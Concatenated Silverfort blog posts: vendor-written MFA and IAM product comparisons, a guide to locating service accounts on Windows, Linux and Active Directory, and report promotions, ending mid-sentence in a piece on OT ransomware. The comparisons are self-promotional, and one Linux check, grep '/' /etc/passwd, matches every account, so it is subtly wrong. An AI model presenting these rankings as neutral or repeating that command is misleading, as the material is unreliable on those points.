Beginning of the Solution As an executive, you operate under the assumption that the people that are directly accountable for the cybersecurity of your organization are prioritizing the purchase and deployment of the right solutions. This is their expertise, and you rightfully trust their judgement. However, as a business leader, you also know that people who are in the trenches of day-to-day work can often miss critical changes as they happen. Your security stakeholders are not ideally placed to zoom out of their 24\7 hand fights with the surrounding cyber threats. But someone needs to ask the tough questions that can’t take anything for granted just because this is the way things were always done. Click here to download the report and gain insight into the identity protection questions you need answers to.   --- - Published: 2023-09-11 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/enterprise-mfa-solutions/ With an increasing number of data breaches and cyber attacks reported daily, multi factor authentication has become essential for any organization looking to strengthen its security posture. However, choosing an enterprise-grade MFA solution is no easy task. There are many options available, each with different capabilities, compatibility requirements, and price points. This article provides an in-depth review and comparison of the leading enterprise MFA solutions on the market today. We evaluate key factors such as the range of authentication methods supported, integration with existing infrastructure and applications, reporting and analytics features, and total cost of ownership. The Evolution of Enterprise Authentication Enterprise authentication has progressed rapidly over the past decade. As cyber threats have evolved, so too have the methods companies use to verify users and control access. Initially, single-factor authentication (SFA) utilizing usernames and passwords were standard. However, the rise of data breaches and credential stuffing attacks rendered this approach obsolete. Static passwords fail to provide adequate protection, as they can easily be guessed, stolen, or cracked. In response, two-factor authentication (2FA) was introduced. 2FA adds an additional layer of security, requiring not only a password but also a one-time code sent via SMS text message or generated by a hardware token. While 2FA mitigates some risks, SMS-based 2FA remains vulnerable to SIM swapping and man-in-the-middle attacks. To address these concerns, enterprises have adopted multi-factor authentication (MFA) and modern authentication methods like push notifications, biometrics, FIDO2 security keys, and risk-based access. MFA combines two or more independent credentials for login, like a password, SMS code, and fingerprint. However, not all MFA solutions are equal. The optimal approach uses a passwordless method, employs machine learning for adaptive risk analysis, provides a frictionless user experience (ideally agentless), and offers robust security and scalability for organizations. Evaluating the Top Enterprise MFA Solutions To determine the best enterprise MFA option, one must evaluate the major players in the market. Some of the prominent solutions are: 1. Silverfort Silverfort is an innovative leader in the enterprise MFA solutions market. Our agentless technology utilizes both rule based and risk-based policies to provide adaptive access control. Unlike other MFA solutions, Silverfort’s technology enables it to extend MFA protection to authentication protocols that don’t natively support MFA such as NTLM and Kerberos. In that manner, a critical portion of the organization’s authentications, that was formerly exposed, is now secured. Silverfort continuously analyzes the activity of all users, creating a unique behavioral baseline profile for each. By understanding a user’s typical behavior and environment, Silverfort can detect anomalies that may indicate account compromise or credential misuse. Our solution then adapts authentication requirements accordingly, prompting for additional verification only when truly necessary. This results in a frictionless experience for legitimate users while still preventing unauthorized access. For organizations dealing with sensitive data or compliance requirements, Silverfort offers a compelling and robust MFA platform. With its risk-based approach, and the extended resource coverage Silverfort is redefining secure access for the enterprise. 2. Okta Adaptive MFA Okta Adaptive MFA stands as a versatile player in the enterprise MFA landscape, offering a range of authentication factors and integrations. Its strength lies in its adaptability, with the system tailoring authentication requirements based on user behavior, location, and device context. However, while Okta provides a strong set of features, it falls short in extending MFA protection to legacy protocols like NTLM and Kerberos, an area where Silverfort excels. Additionally, Okta’s reliance on agents for some integrations can add to the administrative overhead, contrasting with Silverfort’s streamlined, agentless approach. 3. JumpCloud Protect JumpCloud Protect is a relatively new entrant in the MFA market, offering a user-friendly interface and basic MFA functionalities suitable for small to medium-sized enterprises. While it supports common protocols and integrates well with its directory services, JumpCloud's capabilities in handling complex, large-scale environments are limited. Unlike Silverfort, which provides comprehensive coverage including legacy protocols and agentless deployment, JumpCloud's scope remains more suited for less complex IT infrastructures. 4. Thales SafeNet Thales SafeNet, a well-established name in digital security, offers a robust MFA solution focusing on hardware tokens and mobile-based authentication. While its hardware-based security keys provide a high level of security, they may not be as convenient or scalable for large organizations compared to the more flexible, adaptive methods used by other solutions. Additionally, SafeNet’s approach can be less user-friendly and more costly, especially for enterprises looking to secure a wide range of resources and protocols. 5. Duo Security MFA Duo Security, now part of Cisco, is known for its ease of use and straightforward implementation. Its push-based authentication and broad third-party integrations make it a popular choice. However, Duo’s approach, while user-friendly, doesn’t offer the same level of behavioral analytics and adaptive controls found in other solutions. This lack of contextual and risk-based authentication could be a limiting factor for enterprises seeking a more dynamic and proactive security stance. 6. Microsoft Azure AD Microsoft Azure AD, integrated within the extensive Microsoft ecosystem, offers convenient MFA solutions, particularly for organizations heavily invested in Microsoft products. Its integration with Office 365 and other Microsoft services is seamless. However, its capabilities are more standardized and less flexible when compared to Silverfort’s adaptive, risk-based authentication, which can adjust in real-time to emerging threats and unusual user behaviors. 7. Ping Identity MFA Ping Identity offers a strong identity management platform with added MFA capabilities. Its focus is on seamless integration with existing enterprise infrastructures. While it offers solid MFA features, Ping Identity’s approach is more traditional, lacking the innovative, agentless technology and extensive coverage of legacy and modern protocols of other platforms. For enterprises requiring a more advanced, holistic security approach, Silverfort’s solution may be more appealing. 8. RSA SecurID RSA SecurID, one of the pioneers in the MFA space, is known for its token-based authentication system. While RSA has expanded its offerings to include mobile-based authentication, its approach remains somewhat traditional compared to newer, more adaptive solutions like Silverfort. RSA’s strength lies in its established reputation and reliability, but it may not meet the needs of organizations looking for cutting-edge, behavioral analytics-driven security solutions. Key Benefits of Silverfort's Agentless MFA Approach Silverfort’s agentless MFA solution provides several key benefits for enterprise security. Cost Efficiency Silverfort’s agentless approach eliminates the time and money spent deploying and managing authentication agents on users’ devices. ### By integrating into existing identity infrastructure, Silverfort integrates seamlessly without disrupting day-to-day operations or requiring specialist resources to deploy. This streamlined integration reduces total cost of ownership and speeds time to value. Optimized User Experience Silverfort provides transparent multi-factor authentication, meaning users are authenticated automatically in the background without interrupting their workflow. Users simply access applications and systems as usual while Silverfort verifies their identity invisibly using machine learning and behavioral analytics. This invisible, zero-friction experience encourages user adoption and mitigates potential loss of productivity. Real-time Risk Analysis Silverfort leverages advanced AI and machine learning to build a risk profile for each user based on their typical behavior and access patterns. By analyzing over 100 risk attributes in real time, the platform can detect anomalies and risky sign-in attempts, prompting step-up authentication only when necessary. This context-aware approach reduces friction for low-risk access and ensures high-risk access is verified, balancing security and usability. Comprehensive Coverage As an agentless solution, Silverfort provides MFA for all on-prem and cloud resources, as well as all available access method. l This includes command line access, legacy apps, UT infrastructure, VPN, VDI, web apps, servers and more. Silverfort acts as an overlay, enhancing existing security controls with risk-based authentication and closing any gaps in MFA coverage across the organization. This comprehensive approach helps reduce risk exposure and ensures consistent user experience regardless of access method. Silverfort’s agentless MFA platform offers innovative, comprehensive protection with an optimized user experience and lower total cost of ownership. By making multi-factor authentication invisible through real-time risk analysis and seamless integration, Silverfort provides the best of both security and productivity. With its sophisticated machine learning and broad coverage, Silverfort is redefining secure access for the enterprise. The Future of Access Management Powered by Silverfort Silverfort is pioneering a new generation of access management solutions built for today’s borderless networks and hybrid cloud environments. Their innovative platform leverages device trust and risk signals to enable frictionless access while reducing vulnerabilities. Unifying Access Control Silverfort converges multiple access technologies into a single, unified policy engine. This includes passwordless authentication methods like FIDO2, push notification-based access, and traditional passwords and OTPs. Policies can be defined based on user attributes, device trust levels, locations, and more. By consolidating access management into a single solution, organizations benefit from increased visibility, simplified administration, and consistent security enforcement across all resources. Continuous Risk Assessment Silverfort employs machine learning to continuously assess device risk and trust levels. The platform analyzes over 100 attributes including patching levels, configuration issues, compromised credentials, and indicators of compromise. This real-time device risk scoring enables adaptive authentication and granular policy enforcement. Users on trusted devices may experience passwordless access while higher-risk devices prompt for additional authentication challenges. This data-driven approach reduces friction for low-risk access and tightens security for potential threats. Simplified Deployment and Administration The Silverfort platform is designed for rapid deployment across complex environments. It integrates easily with existing infrastructure and can be deployed on-premises or in the cloud. An intuitive, web-based admin console provides a centralized location for managing all access policies, users, and reporting. Role-based access control enables distributed policy administration while still maintaining oversight. Silverfort is poised to dominate the next generation of access management. As networks become more distributed and identities more ephemeral, real-time risk scoring and adaptive authentication are critical. By unifying multiple access technologies into a single, intelligent platform, Silverfort is delivering on the promise of secure access everywhere. Organizations looking to simplify administration, improve visibility, and strengthen security for hybrid environments would be wise to consider Silverfort as their access management solution of the future. Conclusion For enterprises seeking to implement an MFA solution to enhance their security posture, Silverfort is an industry leader that provides comprehensive and customizable options. Our cutting-edge technology offers adaptive authentication and risk-based access control to protect corporate data and resources. With a focus on balancing security and user experience, Silverfort delivers an innovative solution built for the modern digital workspace. For organizations looking to redefine secure access in today's cloud-first world, Silverfort is the clear choice. --- - Published: 2023-09-11 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/finding-service-accounts-on-servers/ Service accounts are often overlooked users on servers and workstations that can pose serious risks if not properly managed and secured. As organizations focus on strengthening human user account security, service accounts are frequently left unmonitored. This grants broad access and privileges that can be compromised by malicious actors. Monitoring service accounts and understanding their permissions is crucial to establishing a strong security posture. This article provides a comprehensive guide to identifying service accounts across an environment. It outlines common account types, locations, and discovery methods to build a full inventory of service accounts. It also highlights how a dedicated solution like Silverfort can automate the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility into every non-human identity and machine-to-machine authentication, as well as its sources, destinations, authentication protocols, and activity volume. By gaining visibility and control over service accounts, organizations can close a critical security gap and strengthen their overall identity and access management programs. What are Service Accounts Service accounts are machine-to-machine user accounts used by applications and services to access resources and perform automated tasks. Often service accounts have elevated privileges which makes them prime targets for attackers. To properly secure service accounts, organizations first need to locate them on their servers. The most effective way to locate service accounts at scale is to use a solution like Silverfort that can automatically discover domain user accounts, determine which ones are service accounts, monitor them for anomalies, and protect them from identity-based attacks. By gaining comprehensive visibility into service accounts, organizations can harden security and simplify compliance. Why You Need to Find Service Accounts Service accounts are a necessity for many server operations, but they also pose security risks if not properly managed. To strengthen security and compliance, organizations need to discover and monitor all service accounts on their servers. Service accounts are operating system accounts used by applications, services or scripts to interact with the system. They allow automated processes to run without human intervention. However, because service accounts often have privileged access, they are attractive targets for attackers. If compromised, they can be used to gain full control of servers and access sensitive data. Common Types of Service Accounts Service accounts are a type of user account created specifically for non-human access to IT systems and services. They are commonly used by applications, scripts, and automation tools to access resources and perform actions. There are several common types of service accounts found on servers: Local Service Accounts Local service accounts run system services on individual devices. They are created and managed locally and not shared across systems. Network Service Accounts Network service accounts provide a consistent identity for services to access resources across networks. They have a broader scope than local service accounts and can be used by multiple systems within a network. Managed Service Accounts (MSAs) Managed service accounts are Active Directory accounts that automate password management, simplify administration, and improve security. They're tied to a service, not an individual administrator, and can be used by multiple systems in a domain. Hybrid Service Accounts Hybrid service accounts are designed to operate across both on-premises and cloud environments. These accounts bridge the gap between traditional network boundaries and cloud-based resources, making them essential in modern, hybrid IT infrastructures. They often require careful configuration to ensure secure and seamless access across different platforms. Hybrid service accounts are particularly relevant for organizations transitioning to the cloud or operating in a mixed environment, where they need to interact with both local data centers and cloud services like AWS, Azure, or Google Cloud. Scanners Scanner service accounts are used by automated tools that perform network or security scans. These accounts require specific permissions to scan systems, networks, and applications for vulnerabilities or compliance checks. Unlike traditional service accounts, scanner accounts often have elevated privileges to access various network segments and systems, making them a critical component of cybersecurity strategies. However, due to their elevated access, they must be tightly controlled and monitored to prevent misuse or exploitation. Locating Service Accounts in Windows Locating service accounts on Windows servers requires investigating several areas of the system. Service accounts are non-interactive user accounts used by Windows services and applications to access resources.   To find service accounts on Windows servers, start by examining the Services console. This contains a list of all installed services, including the accounts they use. Look for accounts with names like “Local Service,” “Network Service,” or “ Service Account. ” Note that some services use the SYSTEM account, which has full control of the system. Next, check for scheduled tasks by going to Task Scheduler > Task Scheduler Library. Here you’ll find tasks that automatically run on a schedule, and the accounts used to run them. Look for any tasks running under privileged service accounts. Then review the Event Viewer, which logs events from Windows services and applications. Go to Windows Logs > Security and look for events with a Logon Type of “Service. ” The Account Name field will show the service account used. This can uncover service accounts not listed in the Services console or Task Scheduler. It’s also important to check for service accounts in the registry. Go to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Service Profiles and look for subkeys named after service accounts. These contain runtime configurations for services using those accounts. Finally, use a tool like the Sysinternals Autoruns utility to scan for Windows Autostart locations. This finds program shortcuts, registry entries, and file system locations where applications run at startup. Review the entries to see if any services are configured to start automatically using privileged service accounts. By thoroughly investigating these areas of a Windows server, organizations can locate hidden service accounts and ensure they are properly secured and monitored. Using a solution like Silverfort’s agentless platform is the best way to automatically discover, assess and protect all service accounts across an environment. Locating Service Accounts in Linux Locating service accounts on Linux servers requires careful detection methods. These privileged accounts are often hidden or disguised to avoid detection, so standard user account discovery techniques may miss them. To uncover service accounts on Linux systems, security professionals should: Check for accounts with UID below 1000 On Linux, UID values below 1000 are typically reserved for system accounts. Any accounts with a UID under 1000 should be investigated to determine if they are service accounts. These may include accounts like “nobody,” “dbus,” or “apache. ” Analyze account naming conventions Service accounts frequently follow standard naming conventions, like “svc-,” “service-,” or “daemon-. ” Accounts following these patterns may be service accounts and should be verified. Some common examples are “svc-admin,” “service-app,” or “daemon-data. ” Review account login shells Service accounts typically have restricted login shells, like “/sbin/nologin” or “/bin/false. ” Any account with one of these as the login shell is likely a service account. This can be checked by running grep /sbin/nologin /etc/passwd or a similar command. Check account home directories Service accounts often have home directories set to “/dev/null” or “/. ” If an account has one of these as the home directory, it is probably a service account. This can be detected using grep '/dev/null' /etc/passwd or grep '/' /etc/passwd. Monitor account login events Because service accounts are typically non-interactive accounts, there should be no login events for these accounts. Any account without login events over a period of time is potentially a service account. This can be checked by analyzing the /var/log/secure or /var/log/auth. log login logs. Using these detection methods, security teams can uncover hidden and disguised service accounts on Linux systems. With a solution like Silverfort, these accounts can then be monitored and protected to help close security gaps and reduce risks. Locating Service Accounts in Active Directory Discovering service accounts in Active Directory can be a challenging task that requires a meticulous approach. These accounts often remain hidden or camouflaged to avoid detection, making it crucial to employ effective techniques specifically designed for their discovery. To uncover service accounts within an Active Directory environment, security professionals should consider the following strategies: Analyze account naming conventions Service accounts in Active Directory frequently adhere to naming conventions that distinguish them from regular user accounts. Look for accounts with names following patterns such as “svc-,” “service-,” or “daemon-. ” Examples may include “svc-admin,” “service-app,” or “daemon-data. ” Identifying these naming patterns can significantly aid in locating potential service accounts. Review account properties and attributes Within Active Directory, service accounts often possess distinctive properties that set them apart. Examine attributes like the servicePrincipalName and description to identify accounts specifically designed for system or application services. Additionally, consider investigating the account membership in privileged groups like Administrators or Domain Admins. Monitor account activity and usage Since service accounts are typically non-interactive, monitoring their activity can help identify potential candidates. Analyze event logs and audit trails to detect accounts with no or minimal login events over a given period. Tools like Windows Event Viewer or specialized security solutions can assist in tracking account login events effectively. Check for special account flags Active Directory provides specific account flags that indicate the purpose or nature of an account. Flags such as DONT_EXPIRE_PASSWORD, SMARTCARD_REQUIRED, or TRUSTED_FOR_DELEGATION can signal service accounts. Identifying these flags can narrow down the search for hidden service accounts. By employing these detection techniques, security teams can successfully uncover concealed service accounts within an Active Directory environment. Once identified, these accounts can be closely monitored and safeguarded using solutions like Silverfort, bolstering overall security and minimizing potential risks. Continuing to prioritize the identification and protection of service accounts ensures comprehensive security measures are in place, enhancing the resilience of Active Directory infrastructures and safeguarding critical assets. Remember, constant vigilance and proactive measures are key when it comes to securing Active Directory against hidden service accounts. Spotting Suspicious Service Accounts Suspicious service accounts are user accounts that have been created to provide access to applications and services, rather than individual users. However, malicious actors often create service accounts to hide their activity and maintain persistence. Some signs that a service account may have been compromised include: The account has an overabundance of privileges. Legitimate service accounts typically only have the minimum permissions required to function. Excessive privileges could indicate the account has been hijacked. The account is not documented. Most organizations maintain records of authorized service accounts and their purposes. Undocumented accounts are more difficult to monitor and are attractive targets for compromise. The account is inactive for long periods of time. Authentic service accounts are typically active and show regular logins, file access, etc. Dormant accounts that suddenly become active could signal unauthorized access. The account has an illogical naming convention. Legitimate service accounts usually follow a standard naming format to indicate their purpose. Illogical or misleading account names may have been selected to avoid detection. Login times are unusual. Most service accounts have predictable login schedules related to their functions. Irregular login times, especially during off hours, could indicate the account has been compromised. Multiple failed login attempts. Repeated failed logins could show that someone is attempting to guess the account's password through brute force. This behavior warrants investigation, as a successful compromise may have occurred or may be imminent. Links to malicious files or connections. If a service account is associated with known malware files, command and control servers, or other indicators of compromise, it is likely that the account has been hijacked for malicious purposes. By closely monitoring service accounts for these suspicious signs and employing a tool like Silverfort to discover and manage accounts, organizations can detect compromises early and remediate risks before major damage occurs. Constant surveillance is key to identifying and mitigating threats from malicious service accounts. Best Practices for Managing Service Accounts To properly manage service accounts, several best practices should be followed. These help reduce risk and ensure service accounts have the least privileged access. The first best practice is to regularly review service accounts and disable or remove any... --- - Published: 2023-09-11 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/enterprise-iam-solutions/ As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems, and sensitive data. However, with a plethora of solutions promising to streamline IAM, determining the right approach for an organization’s needs can be challenging.   The Growing Need for Enterprise IAM Solutions Identity and access management (IAM) solutions have become crucial components of cybersecurity infrastructure. As businesses adopt cloud services and technologies like blockchain, IoT and AI, the number of digital identities and access points has skyrocketed. This expansion increases different security risks and the potential attack surface for cybercriminals. Robust IAM platforms help organizations gain visibility and control over their identities, authentication, and authorization. They streamline user provisioning and de-provisioning of access, enforce security policies, and monitor user activities and access. For enterprises, IAM solutions are essential to reduce risk, improve compliance and safeguard data. Due to the increasing sophistication of cyber threats, enterprise-grade identity and access management is essential. Phishing, malware, data breaches, and insider threats are becoming increasingly sophisticated and difficult to detect. Attackers often gain access by compromising legitimate credentials and accounts. IAM solutions address these risks through multifactor authentication, single sign-on, access management, privileged access management, identity governance and lifecycle management. They employ machine learning and user behavior analytics to detect anomalies and thwart threats. With more users, devices, and applications accessing corporate networks, businesses require a centralized system to manage digital identities and control access at scale. Manual or outdated IAM processes cannot keep up with the volume and complexity. This results in security gaps, inefficient operations, and poor user experience. Enterprise IAM platforms provide a robust, automated solution for managing and securing identities in today’s dynamic environments. They empower security teams with complete visibility, streamline processes, improve productivity, ensure compliance, and reduce operational costs. For these reasons, IAM has become a high priority for CISOs and security professionals looking to strengthen their cyber defenses. Evaluating the Top Enterprise IAM Solutions in the Market To effectively manage identities and access at an enterprise level, organizations must implement a robust IAM solution. The leading options currently available are: 1. Silverfort IAM Integration Silverfort offers a unified identity protection platform that consolidates security controls across on-prem ,cloud and hybrid environments, and can automatically discover and analyze access attempts and identity threats. Silverfort's key feature is its ability to provide full visibility into user and service accounts, and extend security controls such as MFA, conditional access and risk-based authentication policies to legacy on-prem resources. Silverfort's unified identity protection platform integrates seamlessly with existing systems and IT infrastructures, including Active Directory (AD), Entra ID, legacy homegrown applications, file shares, and command-line tools. Lastly, Silverfort offers a unified approach that not only provides a consistent, less confusing experience but also means that users don't have to authenticate multiple times just because they're accessing resources managed by different IAM tools. 2. Microsoft Entra ID Entra ID is a comprehensive IAM solution that stands out for its seamless integration with Microsoft's suite of products and services. It offers a robust set of features, making it an attractive choice for organizations heavily invested in the Microsoft ecosystem. Entra ID's real strength lies in its ability to provide Single Sign-On (SSO) capabilities across a wide range of Microsoft 365 apps, Azure services, and third-party applications. This simplifies user access management and enhances productivity. Additionally, Entra ID's Conditional Access feature allows organizations to implement fine-grained access controls and policies, bolstering security. 3. Okta Okta is a cloud-based IAM platform that is well-known for its user-friendly interface and exceptional integration capabilities. Its versatility makes it a preferred choice for businesses looking to streamline access management processes. Okta's features, including SSO, Multi-Factor Authentication (MFA), and adaptive authentication, contribute to its reputation as a robust IAM solution. Organizations benefit from its extensive catalog of pre-built integrations with thousands of applications, reducing implementation time and effort. Okta's flexibility and scalability are key reasons why it enjoys widespread popularity. 4. Ping Identity Ping Identity is synonymous with robust security and comprehensive IAM capabilities. It caters to organizations that prioritize top-notch access control and identity security. Ping Identity offers a broad range of features, including SSO, MFA, and identity governance. What sets Ping Identity apart is its ability to provide granular control over user access, helping organizations enforce strict security policies. Its support for various authentication methods and protocols makes it adaptable to diverse IT environments. 5. IBM Security Identity and Access Management IBM's IAM solutions, such as IBM Security Access Manager and IBM Identity Governance and Intelligence, are known for their scalability and sophisticated access control features. These solutions are particularly well-suited for large enterprises with complex IAM needs. IBM's IAM offerings offer a blend of user authentication, policy enforcement, and governance capabilities. They excel in handling diverse user populations and ensuring compliance with regulatory requirements. 6. ForgeRock Identity Platform ForgeRock Identity Platform is a versatile IAM solution designed to meet a wide range of identity management needs, including Customer Identity and Access Management (CIAM). ForgeRock stands out for its flexibility and adaptability, making it an excellent choice for organizations focused on enhancing customer engagement. It empowers businesses to manage identities across various channels and seamlessly integrate customer-facing applications. 7. OneLogin OneLogin is a cloud-based IAM solution lauded for its simplicity and rapid deployment capabilities. It offers features such as SSO, MFA, and adaptive authentication. OneLogin's extensive library of pre-built connectors for third-party applications simplifies integration efforts, allowing organizations to quickly establish secure access controls. It's a convenient choice for businesses seeking a straightforward IAM solution that offers scalability and a user-friendly experience. 8. SailPoint IdentityNow SailPoint IdentityNow is a comprehensive IAM solution renowned for its emphasis on identity governance and lifecycle management. It is a valuable choice for organizations seeking to strengthen compliance and role-based access control (RBAC). SailPoint IdentityNow empowers organizations to efficiently manage user identities, automate provisioning and deprovisioning, and ensure adherence to compliance standards. Its user-friendly interface simplifies the management of complex IAM processes. Why Silverfort stands out as the best Enterprise IAM Solution Due to its unique capabilities and features, Silverfort stands out as an enterprise Identity and Access Management (IAM) solution. It offers a unified identity protection platform that consolidates security controls across corporate networks and cloud environments, blocking identity-based attacks. Silverfort's key feature is its ability to provide clear visibility into user behavior across hybrid networks, which facilitates the detection of anomalies and malicious behavior. Silverfort extends modern security controls to legacy on-premises resources and applies conditional access and risk-based authentication policies using on-premises IAM directories. Silverfort's solution is designed to handle the challenges of managing multiple IAM solutions across hybrid and multi-cloud environments. It uses agentless and proxyless technology to seamlessly integrate with IAM solutions across hybrid environments and automatically discovers and analyzes applications and resources, including those that still rely on passwords and legacy protocols. Silverfort's platform accelerates and optimizes the migration of all applications to cloud-native identity platforms like Entra ID, while serving as a 'bridge' for assets that could not be migrated before, such as legacy and homegrown applications, IT infrastructure, Active Directory managed servers and endpoints, assets that reside on other cloud environments, including multi-cloud, file shares and databases, command-line tools and other admin interfaces, machine-to-machine access (service accounts), and industrial and medical systems. Lastly, Silverfort provides a better user experience by offering a unified approach to IAM, which not only provides a consistent, less confusing experience but also means that users no longer have to authenticate multiple times, with a different sign-in method just because they're accessing resources that happen to be managed by different IAM solutions. What Is Identity and Access Management (IAM)? Identity and access management (IAM) refers to the security discipline that enables the right individuals to access the right resources at the right times for the right reasons. IAM solutions provide authentication, authorization, and identity governance for an organization's digital assets, including data, applications, infrastructure, and connected devices. Authentication verifies a user's identity, often through a username and password. Authorization determines the level of access privilege for each user based on their identity and role. Identity governance establishes and enforces identity and access policies to ensure compliance. Together, these components grant employees, partners, and customers appropriate access to technology resources while reducing the risks of data breaches and cyber threats. Effective IAM is crucial for security and compliance in today's digital environments. For enterprises, IAM poses significant challenges due to the scale and complexity of resources, users, and access requirements. Enterprise IAM solutions offer robust capabilities to streamline and govern identity and access across an organization. Key features include: Centralized user directory to manage employee and non-employee identities in one place. This includes profile data, authentication credentials, access rights, and more. Role-based access control (RBAC) to assign access to users based on their job functions and responsibilities. This minimizes excessive permissions and ensures the least privilege. Workflow automation to approve, certify, and revoke access according to established policies. This includes access requests, reviews, and attestation. Audit reporting and analytics to monitor access, detect anomalies, and generate insights for risk mitigation. Integration with IT infrastructure like human resources systems, directories, and security tools. This provides a seamless IAM experience across domains. Scalability to handle tens of millions of identities, credentials, and access points without impacting performance or user experience. Deployment flexibility with options for on-premises, cloud-based, and hybrid environments. Solutions must work with existing infrastructure. --- - Published: 2023-09-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/attention-cisos-closing-your-identity-protection-gaps-is-urgent/ Here’s something that won’t be news to you: The identity-based attack surface is exposed to attacks. But what about your own organization? Do you know where your specific protection gaps are? A new report released by Osterman Research, entitled “The State of the Identity Attack Surface,” reveals the full extent of where today’s cybersecurity measures are falling short. For example, solutions that have aimed to deliver real-time prevention of malicious access using compromised credentials – specifically multi-factor authentication (MFA) and privileged access management (PAM) – are insufficiently deployed. The report shows, in fact, that the vast majority of organizations have only a portion of their users and resources covered. Additionally, most organizations are still lacking full visibility into (not to mention protection of) the service accounts in their environment. These inadequate defenses point to an alarming weakness in the identity attack surface — and one that adversaries continue to take advantage of with account takeover, lateral movement, and ransomware spread. The CISO's Challenge: Identifying and Prioritizing the Most Critical Risks This report gets to the core of what you do on a daily basis as CISO, which is prioritizing risks and determining which security battles to fight. Just like your peers, you’re probably painfully aware that your organization’s security posture could stand some improvement. While you may have many attack vectors covered, others remain a challenge to address adequately. The report indicates that identity threats almost definitely fall into this second category. The Exposed Identity Attack Surface Fuels Account Takeover and Ransomware Spread The “State of the Identity Attack Surface” report gives you an opportunity to zoom out from your own organization and acknowledge that there is actually a fundamental security gap common to nearly every enterprise. And this is not a theoretical gap but rather a critical weakness that adversaries continue to take advantage of — a weak link in the chain that keeps resulting in the kinds of devastating ransomware attacks your executive team worries about. Demonstrate to Executives That the Risk of Identity Threats is Real From the perspective of the executive team, you’re probably seen as the person who cries wolf, constantly sounding the alarm bell about the latest threat. But little do they realize just how difficult it is to determine which of the many risks your architects and SecOps managers surface are the most urgent. This is where being a CISO can indeed be a thankless job, where determining which risk is top priority has consequences and the accountability for a wrong move rests on you alone. But “The State of the Identity Attack Surface” empowers you to make the case as to why investing in identity protection is imperative. Because it’s not just your intuition about this issue; it’s actually a pervasive problem as well as one that, if left unattended, will undoubtedly result in breaches and losses. In fact, this report is the first one to introduce the perspective of identity as an attack surface. It asks a simple question: Are you able to block malicious access with compromised credentials in the same way that you block malicious software on your endpoints or malicious traffic on your firewall? The report demonstrates that only a small percentage of organizations can answer that question affirmatively. Benchmark Your Organization Against the Field and Take Action to Bring About Change In the report, you’ll see what the actual level of protection is for users, admins, and service accounts across most enterprises. You can also benchmark your organization against findings from other companies, as well as against an identity security maturity model. Now, when making the case for identity protection to your CIO or CEO, you’ll have iron-clad arguments as to why this needs to be top priority. As CISO, you are the person charged with protecting your organization from breaches. You lose sleep at night because you know where the protection blind spots are. But “The State of the Identity Attack Surface”can be your best resource in addressing these blind spots and finally resolving the issue of identity protection. Download the report here. --- - Published: 2023-09-05 - Modified: 2024-04-17 - URL: https://www.silverfort.com/blog/the-defenses-of-the-identity-attack-surface-are-broken/ Today we released the world’s first report into the identity attack surface conducted by Osterman research and commissioned by Silverfort – The State of the Identity Attack Surface: Insights into Critical Security Gap. The report provides two key insights for security stakeholders: Identity is a highly targeted attack surface with compromised user credentials serving as the main attack vector. Security controls of this attack surface are poorly implemented, In most organizations, leaving it at critical risk of exposure. What is the identity attack surface? The identity attack surface includes all the organizational resources that are accessed with user credentials. Attacks use them to gain malicious access to these resources—prominent examples of which are account takeover, lateral movement, and internal ransomware spread. Why is the identity attack surface still exposed? The rise of identity threats is already common knowledge. What is significantly less known – and misunderstood – is why they continue to be instrumental in most major cybersecurity incidents. To quantify the key weaknesses that keep organizations vulnerable, this report examines the defenses they have in place – such as Multi-Factor Authentication (MFA), Privileged Access Management (PAM) and others – while bringing the perspective and voice of the identity security teams who are accountable for their deployment and operation. Our findings can be neatly summarized: Identity-based attacks and threats thrive because of critical gaps in organizations’ security stacks. The identity attack surface is a priority for all Identity security teams have acknowledged that the solutions and practices that aim to prevent malicious access with compromised credentials are subject to significant coverage gaps rendering their protection practically ineffective. These gaps are either in the percentage of critical resources that are protected, or in the number of users they are applied to. This insight is a common and indisputable consensus amongst IAM directors, architects, and identity infrastructure managers. However, it rarely passes the doorstep of CIOs, executives, and board members. One of our key motivations in commissioning this report was to bring this first-hand voice to the attention of higher-level decision-makers. Actionable Insights: asking the right questions to lock down the identity attack surface Taking action from these findings really requires a shift in mindset – a shift in the questions business and security leaders must ask themselves. The right question to ask is not whether MFA budgeted for and acquired. The answer in almost all cases would be yes. Instead, they should be asking whether their MFA solution covers all resources and access methods used by adversaries. This is a whole different ball game, and the answer to that will surprise you. Similarly, it’s not enough to ask whether you’ve started a PAM journey Instead the question should be can we protect our privileged users AND service accounts? Our research shows that only 5. 7% of organizations have full visibility into their service accounts, and 78% of organizations cannot prevent the misuse of service accounts in real-time, since security is sporadic or missing. For this reason – to help this vital mindset shift – The State of the Identity Attack Surface report is much more than just a pack of interesting identity security findings. It’s also a tool to benchmark your organization’s resilience against identity threats. It provides you with the right questions to ask to assess the exposure of your organization’s identity attack surface. It’s time to completely rethink identity security – and it’s easier than it sounds The identity attack surface is at the forefront of today’s cyber threat landscape. Every passing incident in the headlines proves that businesses cannot implicitly trust that the purchase and deployment of identity security controls translates into sound resilience against identity threats. In fact, in most cases the opposite is true. It is clear, therefore, that we must fundamentally rethink identity security in order to put a halt to the exponential growth of identity-based attacks and threats. The first step towards this is to get a clear, impartial view of the key security gaps exposing the identity attack surface. The State of the Identity Attack Surface report is a good place to start this journey. Download the report here. --- - Published: 2023-08-31 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/protecting-oil-and-gas-companies-from-ransomware-threats-strengthening-air-gapped-ot-networks/ In today's interconnected world, the cybersecurity landscape has grown increasingly complex, especially for critical industries such as oil and gas. The rise of ransomware attacks targeting this sector has raised serious concerns about the security of their operational technology (OT) networks. Traditionally thought to be safe due to their air-gapped nature, OT networks are no longer as isolated as they once were. This blog explores the security concerns of oil and gas companies regarding ransomware attacks on their air-gapped OT networks and introduces the Silverfort Unified Identity Protection Platform as a comprehensive solution. The Purdue Model and Air-Gapped Networks The Purdue Enterprise Reference Architecture, commonly known as the Purdue model, is a widely used framework to organize and structure industrial control systems (ICS) environments. It consists of hierarchical levels, ranging from Level 0 (sensors and actuators) to Level 4 (business systems). The air-gapped OT network, which includes components like programmable logic controllers (PLCs), human-machine interfaces (HMIs), and engineering workstations, usually resides in Level 1 and Level 2 of this model. Historically, these networks were considered isolated from external threats due to their physical separation from the corporate 